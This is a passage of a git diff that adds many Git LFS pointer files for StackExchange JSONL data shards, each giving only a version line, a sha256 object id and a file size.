a/data/stackexchange/1-1/1320_2289.jsonl b/data/stackexchange/1-1/1320_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..43fe19464db0db0ed1605ac4d4638e016a5a67db --- /dev/null +++ b/data/stackexchange/1-1/1320_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:f3ce058996da74bbecd9b243b685249468d06fb370ad6ae898185fcb17ed6ca7 +size 38720994 diff --git a/data/stackexchange/1-1/1321_2289.jsonl b/data/stackexchange/1-1/1321_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..705a11ec0047788ac624b5087d51aea81662658a --- /dev/null +++ b/data/stackexchange/1-1/1321_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a50337a7fb4ad7f7c92bc226661bae0a4616b7858ee6a67ceec78e46217331fe +size 39586601 diff --git a/data/stackexchange/1-1/1322_2289.jsonl b/data/stackexchange/1-1/1322_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a36175c49704d88a126bfe1adc9116891fccc566 --- /dev/null +++ b/data/stackexchange/1-1/1322_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a16cdc989cd0c172d428df0e47428c6bf7f1ff337f0e47e6fc432d19eec02e55 +size 39318645 diff --git a/data/stackexchange/1-1/1323_2289.jsonl b/data/stackexchange/1-1/1323_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d3776c94284adc758c05a6a82a858c3e89db8fd --- /dev/null +++ b/data/stackexchange/1-1/1323_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:820eaa199709d3922b9b18520ae44c4de436b746bb5dee2fa64a2a79b18cce84 +size 39871205 diff --git a/data/stackexchange/1-1/1324_2289.jsonl b/data/stackexchange/1-1/1324_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b882ce030f48aa59a3da58200bab919a99fb966e --- /dev/null +++ b/data/stackexchange/1-1/1324_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7cf59a4d12119f1595d784a303484b5078a4ba5e8691ce9bc569bb64d41098db +size 38963494 diff --git a/data/stackexchange/1-1/1325_2289.jsonl b/data/stackexchange/1-1/1325_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..13f754d720332cf7b1c16a1df9303a684edfd46b --- /dev/null +++ b/data/stackexchange/1-1/1325_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fc48cad09b2bdf30895cd86735f606193107580e93cac01a409dc94cefc71ce +size 38583055 diff --git a/data/stackexchange/1-1/1326_2289.jsonl b/data/stackexchange/1-1/1326_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ecfc6c4fa9edb0eee20122c2243548d789d7b2e --- /dev/null +++ b/data/stackexchange/1-1/1326_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a04d2ee5c9a47fc307d0f67ccb8f2fa179aec01eb8b86bc731e90580ea25116 +size 39371023 diff --git a/data/stackexchange/1-1/1327_2289.jsonl b/data/stackexchange/1-1/1327_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d7f45541af2dcdcbac4e657ee002d94ab0acc2ce --- /dev/null +++ b/data/stackexchange/1-1/1327_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5f143b4b067358768a199e179f950295566975cd45b8f70261cbaf11c0c487c +size 39582338 diff --git a/data/stackexchange/1-1/1328_2289.jsonl b/data/stackexchange/1-1/1328_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d1cacf04b2dfbf3cf8f95c9aedb5ecea51efeb20 --- /dev/null +++ b/data/stackexchange/1-1/1328_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:527649dfaebd9f14321ea66a62bc03805c068f2c8dfc77cce2d68f9427fdb7e6 +size 40186549 diff --git a/data/stackexchange/1-1/1329_2289.jsonl b/data/stackexchange/1-1/1329_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..b91006c8c4a413d2fbed407bcff36930596cfc95 --- /dev/null +++ b/data/stackexchange/1-1/1329_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f58bc8e0804e4f3c26378a5a2bae1915352855b6c2f05a8e485340f05145441 +size 39612170 diff --git a/data/stackexchange/1-1/132_2289.jsonl b/data/stackexchange/1-1/132_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..131dd01bd5fcfb247e539eb89c1ae1aec63aec5f --- /dev/null +++ b/data/stackexchange/1-1/132_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5f9f71470a90a790b218138dc072c393c987ad0d45bf7fb170bf00251169613 +size 33310119 diff --git a/data/stackexchange/1-1/1330_2289.jsonl b/data/stackexchange/1-1/1330_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a82f516257447a349cfbeb7841a507266042ecea --- /dev/null +++ b/data/stackexchange/1-1/1330_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d9d8f041be2626899468bfa5b3472dd2e4e131f98d311f73161133fe6bcace9 +size 39260336 diff --git a/data/stackexchange/1-1/1331_2289.jsonl b/data/stackexchange/1-1/1331_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8870726b1e20d3f1fcd740e6d4928c02e6266ec --- /dev/null +++ b/data/stackexchange/1-1/1331_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:451edef60121332426805420246c61fa6b504abb2ec9fb9975bfdb5321958761 +size 39512776 diff --git a/data/stackexchange/1-1/1332_2289.jsonl b/data/stackexchange/1-1/1332_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0de474e171e1337cb948b0d5b87b47a72581978e --- /dev/null +++ b/data/stackexchange/1-1/1332_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc17540c3f32ddad319083386aa7b88043c4a4ef4da310f95ddfb99a251fc017 +size 39684655 diff --git a/data/stackexchange/1-1/1333_2289.jsonl b/data/stackexchange/1-1/1333_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d1600c8e899b14f8fb67ff24d1a958b0b89839d --- /dev/null +++ b/data/stackexchange/1-1/1333_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eabeb5d335c19ca81849f859d63d4f0668238eaf8b05a8521ea0cc241152e814 +size 39666738 diff --git a/data/stackexchange/1-1/1334_2289.jsonl b/data/stackexchange/1-1/1334_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fec4e6a4a95d150e498d07fa6417ad05d6a77162 --- /dev/null +++ b/data/stackexchange/1-1/1334_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97b6fbdae13d245a08427fd0f369a56276944787196c612c0a68be7c5bc6909e +size 39873905 diff --git a/data/stackexchange/1-1/1335_2289.jsonl b/data/stackexchange/1-1/1335_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..198e9fa0905bb8dd0957c86e60812d673ea0ced0 --- /dev/null +++ b/data/stackexchange/1-1/1335_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02f1ed20b75a1a9f1f1b3073ad10ae9ac40a420129549b4c1e5a0bae54a501de +size 39773054 diff --git a/data/stackexchange/1-1/1336_2289.jsonl b/data/stackexchange/1-1/1336_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e08ed48613c0c8864c33d108959a565a90f6014 --- /dev/null +++ b/data/stackexchange/1-1/1336_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:6db4fbf60c2290cd3d81ea2fe084c515762ea114daa3652bf9c4a1b9c6648d68 +size 40001033 diff --git a/data/stackexchange/1-1/1337_2289.jsonl b/data/stackexchange/1-1/1337_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..85ad7b0a56f2f21ba2ff95dcc70386fe9a76cc7f --- /dev/null +++ b/data/stackexchange/1-1/1337_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd088141ed26060ae90e4ade92a67e319eee784804618b12a7f38a1e8678414e +size 39791447 diff --git a/data/stackexchange/1-1/1338_2289.jsonl b/data/stackexchange/1-1/1338_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f2f9827a3ab40d068adee9aa9a9aafac9615815 --- /dev/null +++ b/data/stackexchange/1-1/1338_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45a3c4da53b728506dfedf1b5272d20fcb11c1700ff2a60b312cc9f8fc034727 +size 39233259 diff --git a/data/stackexchange/1-1/1339_2289.jsonl b/data/stackexchange/1-1/1339_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a8abf7adb14d0be2f679f139fcc791790818ca7c --- /dev/null +++ b/data/stackexchange/1-1/1339_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e7a78ca099369b7dd51e04847cea0ae0de259319b7014690bbd5883750f6345 +size 37002706 diff --git a/data/stackexchange/1-1/133_2289.jsonl b/data/stackexchange/1-1/133_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c08ee3d079e2210dd87615818a65d567efb15148 --- /dev/null +++ b/data/stackexchange/1-1/133_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0bd3994499daebbfeef3a03eaf058cb3fdfa9aba38bd459cb4a42592de377d9c +size 33915672 diff --git a/data/stackexchange/1-1/1340_2289.jsonl b/data/stackexchange/1-1/1340_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02035cb77b6cc7b2b241a9457d11a548151ddc9b --- /dev/null +++ b/data/stackexchange/1-1/1340_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79b994d447c57ffb83c5c9f033e9a06751bf9ff8d823797606bc484d877296f7 +size 38063659 diff --git a/data/stackexchange/1-1/1341_2289.jsonl b/data/stackexchange/1-1/1341_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b0f4cb7f9b6399cd285e0fcabf9ff42611365f9 --- /dev/null +++ b/data/stackexchange/1-1/1341_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4815d4f407615932c4a1617d6b5d2d88e035899eb998ba4f02d9f257595f5af +size 37212732 diff --git a/data/stackexchange/1-1/1342_2289.jsonl b/data/stackexchange/1-1/1342_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df1c20cc97e21fcb8cea19081d642e2da745bbe7 --- /dev/null +++ b/data/stackexchange/1-1/1342_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09bd02bda0398f199f667f75095eaba227731fb5b6da9647d5104a8601908cbd +size 37227529 diff --git a/data/stackexchange/1-1/1343_2289.jsonl b/data/stackexchange/1-1/1343_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eab92e409f141da86988ceb3f65f7b84fc13a622 --- /dev/null +++ b/data/stackexchange/1-1/1343_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fabbb74a48273da7fcbdee5fffa30f592c77b8f40de38759da79725e0230ad5 +size 36990420 diff --git a/data/stackexchange/1-1/1344_2289.jsonl b/data/stackexchange/1-1/1344_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..cffadd41e57f395bac24b0419cd951d3cc5ac5ed --- /dev/null +++ b/data/stackexchange/1-1/1344_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16888d76c374d863505c3b4f681bd4340b98dfe821958ce90cbc7dd5ef2b8af9 +size 37113766 diff --git a/data/stackexchange/1-1/1345_2289.jsonl b/data/stackexchange/1-1/1345_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7bcd862a51da11ec9689353633b351092b90686d --- /dev/null +++ b/data/stackexchange/1-1/1345_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64b6f3cfc7d8df0ae2c81340f837e1ecdf9e7255141b4e7186a71b874b79e257 +size 37482888 diff --git a/data/stackexchange/1-1/1346_2289.jsonl b/data/stackexchange/1-1/1346_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..73c1ee6666e0c281108b0b654259bda67715b993 --- /dev/null +++ b/data/stackexchange/1-1/1346_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be5d931ae91f902ef5fe48f24cc3e79179fc1c767a6447f8105c2d82c55f67f8 +size 37626430 diff --git a/data/stackexchange/1-1/1347_2289.jsonl b/data/stackexchange/1-1/1347_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82b20bdb35bf9793b7df479330b2c57e1b6aea66 --- /dev/null +++ b/data/stackexchange/1-1/1347_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d26ca5dd97f01a0b182c6d83fcea29ad836bb6e7998d6c157758152ce121712 +size 37322176 diff --git a/data/stackexchange/1-1/1348_2289.jsonl b/data/stackexchange/1-1/1348_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea3044138ec40f0c456edae0b4dd0529dbdcdbaf --- /dev/null +++ b/data/stackexchange/1-1/1348_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b61b7b3e4336b6ef6f20e129b610af0699338bdb9bc654f2958b0ab441e7947 +size 37568764 diff --git a/data/stackexchange/1-1/1349_2289.jsonl b/data/stackexchange/1-1/1349_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5fe28abced09d50dd0b125f8cb4a8de6a16da4a8 --- /dev/null +++ b/data/stackexchange/1-1/1349_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91f42560705bfed61b62359b0299ee153d192a62e623328e185322207c5447ba +size 37441446 diff --git a/data/stackexchange/1-1/134_2289.jsonl b/data/stackexchange/1-1/134_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a806802e1085603e70c2e653222a8b5adcc2b310 --- /dev/null +++ b/data/stackexchange/1-1/134_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:763a985e53362ad2a7076bc5473fdb7c4706cc8cc48357755518e4b0b2cc425a +size 33616133 diff --git a/data/stackexchange/1-1/1350_2289.jsonl b/data/stackexchange/1-1/1350_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c7bdde4a276c036e2759bfac3ae9a4d9c9b8222 --- /dev/null +++ b/data/stackexchange/1-1/1350_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:847ae2463df97613743fee52c2d35d284de856792ed2004563133f07e29e576e +size 37391595 diff --git a/data/stackexchange/1-1/1351_2289.jsonl b/data/stackexchange/1-1/1351_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..be6dfa6f8e2f44c265b71c0d57242a4daaaedf48 --- /dev/null +++ b/data/stackexchange/1-1/1351_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:e583d815e54d8fc6db40fab7ca0d7dae6dce5fd080e1b8641e3b169c619e99e9 +size 37269652 diff --git a/data/stackexchange/1-1/1352_2289.jsonl b/data/stackexchange/1-1/1352_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a5c5e92defa47eca9d109653537d3e7df81f95c6 --- /dev/null +++ b/data/stackexchange/1-1/1352_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fbec7cd178552d5f099796b75ae41cf8c429afcd2690956fe0f142aa91e4119 +size 37310404 diff --git a/data/stackexchange/1-1/1353_2289.jsonl b/data/stackexchange/1-1/1353_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7158f109025a4db18218a16e150e13f9c39081d --- /dev/null +++ b/data/stackexchange/1-1/1353_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80f56e003d25c2a8464945a4c8ed0486c9dadbc0f0c181ffacc828722a53db19 +size 37047162 diff --git a/data/stackexchange/1-1/1354_2289.jsonl b/data/stackexchange/1-1/1354_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c3a582c6b2820d4280a981dd64f041db36c33555 --- /dev/null +++ b/data/stackexchange/1-1/1354_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af51ee0460e85c9e484e06094507685974213efb64cf8d18a03b15ceb5d421e3 +size 37312889 diff --git a/data/stackexchange/1-1/1355_2289.jsonl b/data/stackexchange/1-1/1355_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1312b979634f51f12f36546f4e8cf5b3f78a3365 --- /dev/null +++ b/data/stackexchange/1-1/1355_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e3ae666447955928dfe91fdd0f3a1a5846050d2ebe8203877e598f6502cd716 +size 36886868 diff --git a/data/stackexchange/1-1/1356_2289.jsonl b/data/stackexchange/1-1/1356_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed5d04252ba9a2eeb3fe5400b2cafadbbf25939c --- /dev/null +++ b/data/stackexchange/1-1/1356_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c313dca9b7c5571193498c2c4814a38817c9e9d2eead14f8eefb59d3e544d9a +size 37436362 diff --git a/data/stackexchange/1-1/1357_2289.jsonl b/data/stackexchange/1-1/1357_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd0e4a179531ee9d420fe11822c13734af4c51ce --- /dev/null +++ b/data/stackexchange/1-1/1357_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62c1c83672008d64c0852c388031ab63265856c9367e556f3d1c237066b96330 +size 36693309 diff --git a/data/stackexchange/1-1/1358_2289.jsonl b/data/stackexchange/1-1/1358_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ac23c4a8b627e5bc180da0f23858c89423cce69 --- /dev/null +++ b/data/stackexchange/1-1/1358_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:315530c7efca67475c0494f566d9f604037e5d14375dbbebf300f79d5979b8eb +size 37237601 diff --git a/data/stackexchange/1-1/1359_2289.jsonl b/data/stackexchange/1-1/1359_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7ed33786c3fe1aed54423ca12f22cfb72aa05b6 --- /dev/null +++ b/data/stackexchange/1-1/1359_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d31638141ac2dcf24a924771a30de14e0e7478fae63558e09c86ad98261d581c +size 37270823 diff --git a/data/stackexchange/1-1/135_2289.jsonl b/data/stackexchange/1-1/135_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..c69b921ce71ec888a2591e96c656d2c1495a8ff5 --- /dev/null +++ b/data/stackexchange/1-1/135_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:adaf6e71d7cb6a677bb21e30a8954550d9f727ef41a80dca64d37b858c6251ec +size 33351609 diff --git a/data/stackexchange/1-1/1360_2289.jsonl b/data/stackexchange/1-1/1360_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b2d3a8d095a210ce177620239c698f012dfa492a --- /dev/null +++ b/data/stackexchange/1-1/1360_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48a67e163331ef1010ac8da3e258c189c6ce37b3af43bd3b10b22297549fa716 +size 37477816 diff --git a/data/stackexchange/1-1/1361_2289.jsonl b/data/stackexchange/1-1/1361_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f0e2443afc9f4703ef502101debe16b60993e229 --- /dev/null +++ b/data/stackexchange/1-1/1361_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89211d23504f992852311a9fb477e3f26101facbe0c52e9991a8941aa4db1893 +size 37696653 diff --git a/data/stackexchange/1-1/1362_2289.jsonl b/data/stackexchange/1-1/1362_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1647465076b0e0d2c44e86a04a85ace758eee74 --- /dev/null +++ b/data/stackexchange/1-1/1362_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb61ded2c1cf8d95e879b7b7b3b3583cf74e70a991db96a2b075e799b55019df +size 37332427 diff --git a/data/stackexchange/1-1/1363_2289.jsonl b/data/stackexchange/1-1/1363_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6769295ae5b841bacadee7e135562dac4d52d7e --- /dev/null +++ b/data/stackexchange/1-1/1363_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fab13b88adcba65f6b4f2fef7647fabf9890cb9438ca8268a3874c2f07e9b9f9 +size 37739520 diff --git a/data/stackexchange/1-1/1364_2289.jsonl b/data/stackexchange/1-1/1364_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b63da45dd0e6c3f8d93177b424cb8a11cf9cbd28 --- /dev/null +++ b/data/stackexchange/1-1/1364_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd4eda785e9d476ad0330b46911d4c94fafa45c62af4a0f87868609882c2573d +size 36836880 diff --git a/data/stackexchange/1-1/1365_2289.jsonl b/data/stackexchange/1-1/1365_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fd07f80aae9972cd0d381b656aaeb3b98d903e73 --- /dev/null +++ b/data/stackexchange/1-1/1365_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:768043af91b2f5b41c3d7d16c4d2eab4ed8371060d13cf5df83143ca576ccecf +size 37201808 diff --git a/data/stackexchange/1-1/1366_2289.jsonl b/data/stackexchange/1-1/1366_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..70638ac583fad97724fe5e58e3c2b7ae2bef1c45 --- /dev/null +++ b/data/stackexchange/1-1/1366_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9d916293e32d2e0267ba66a584a8a69f0e0925d701584173af7a87338e86998e +size 37005296 diff --git a/data/stackexchange/1-1/1367_2289.jsonl b/data/stackexchange/1-1/1367_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61ac0ead4862d8af48a561c1b5aaa8de34898127 --- /dev/null +++ b/data/stackexchange/1-1/1367_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:b05453d491f797b1ff19fca1699eba59a4e0f655b000b0378e33998b94975d7b +size 37182355 diff --git a/data/stackexchange/1-1/1368_2289.jsonl b/data/stackexchange/1-1/1368_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c2070dd680e909568605c7bfa9c957162c55fb3 --- /dev/null +++ b/data/stackexchange/1-1/1368_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:670d55d4b7d998216bb92977e562f578593cd23ae8775d1495a5d0ffedc9e7ec +size 37443029 diff --git a/data/stackexchange/1-1/1369_2289.jsonl b/data/stackexchange/1-1/1369_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63ed015dcc63533f42958b9fa5dee319258cfa08 --- /dev/null +++ b/data/stackexchange/1-1/1369_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44b0099caf0600e358434dee104151c77b0215282bfd4deddd9c1ce4d2fb6653 +size 36949905 diff --git a/data/stackexchange/1-1/136_2289.jsonl b/data/stackexchange/1-1/136_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c1afdddeb7fc05f35afa5ae776f4a2e0d643bc3 --- /dev/null +++ b/data/stackexchange/1-1/136_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25196a19be0e6d51a9d0045a36f5b297bfbcf4e365259e891d5fd35ce8f8ac39 +size 33490404 diff --git a/data/stackexchange/1-1/1370_2289.jsonl b/data/stackexchange/1-1/1370_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..085886545140c368427ea0214e39c16f5c165415 --- /dev/null +++ b/data/stackexchange/1-1/1370_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f300c5e54b3a350bd3c30f54efe15705c5df7ebec1f2f0c2201fc01007fef531 +size 37495852 diff --git a/data/stackexchange/1-1/1371_2289.jsonl b/data/stackexchange/1-1/1371_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..31eb116a76ef572af1a089bf63462adb923f9d70 --- /dev/null +++ b/data/stackexchange/1-1/1371_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44a2fc65c2d0be5fd8ff4ed8d6b7c5b3a34b507b597fcf9f05a879975a47c1ba +size 37235270 diff --git a/data/stackexchange/1-1/1372_2289.jsonl b/data/stackexchange/1-1/1372_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a4ff42163d3dab3c45a6132e9836d3b07ebf30f4 --- /dev/null +++ b/data/stackexchange/1-1/1372_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c194fe9b8e3673117770d27e0513a10c0614dff0a4f763aa65c1f89b30495ae +size 37401862 diff --git a/data/stackexchange/1-1/1373_2289.jsonl b/data/stackexchange/1-1/1373_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a398bd3b3e6dbecf72495ce80562b8bcd8efe7d --- /dev/null +++ b/data/stackexchange/1-1/1373_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f8e01272813cf7f8b210f17499fad92cba5f29d9598717dfecfbef2cb9f6f9c +size 37065476 diff --git a/data/stackexchange/1-1/1374_2289.jsonl b/data/stackexchange/1-1/1374_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..73e4e7e32f8e1c4f75b9a4e1f695a816ac189fb0 --- /dev/null +++ b/data/stackexchange/1-1/1374_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcbff032f2f43879c50c1953a6316b4da2662f272078dcc62c94deea34514c4a +size 37929273 diff --git a/data/stackexchange/1-1/1375_2289.jsonl b/data/stackexchange/1-1/1375_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..17a32dc037be85494ad346bb2c522fa8962821b8 --- /dev/null +++ b/data/stackexchange/1-1/1375_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:069cda5be55d6b249acc15d14e9d05a899565f1c8a74b80680fc7cd63db383cc +size 37350058 diff --git a/data/stackexchange/1-1/1376_2289.jsonl b/data/stackexchange/1-1/1376_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..569620046cb371e8093dfc4f8d309d9ee0ac930f --- /dev/null +++ b/data/stackexchange/1-1/1376_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75d9e94a9cf1ec1999a8e004d466755775e3e9ce3d8fbba7dc14a1ccd5a4a958 +size 37193391 diff --git a/data/stackexchange/1-1/1377_2289.jsonl b/data/stackexchange/1-1/1377_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6ef87e2033450842a535cd4b1b162482f139fbf5 --- /dev/null +++ b/data/stackexchange/1-1/1377_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:965cdfbbf4ac73b149524e98b0da27f89db933d8ccb73f7f34c20e58f573a780 +size 37099456 diff --git a/data/stackexchange/1-1/1378_2289.jsonl b/data/stackexchange/1-1/1378_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae875de221550eb443ab3bfdd8a50652c8487c9f --- /dev/null +++ b/data/stackexchange/1-1/1378_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47498ae07582a5f4044d42b9e4a05f7d8e0aac17b2db24816eb1edbdfacf120c +size 37014303 diff --git a/data/stackexchange/1-1/1379_2289.jsonl b/data/stackexchange/1-1/1379_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..819d326993548f8bd6c562ca1277201d0af6ff6b --- /dev/null +++ b/data/stackexchange/1-1/1379_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f4588ce974a34911d0e12112ae01371fb281fcdd48cb5d12f84a9016216566c +size 37577797 diff --git a/data/stackexchange/1-1/137_2289.jsonl b/data/stackexchange/1-1/137_2289.jsonl new file mode 100644 index 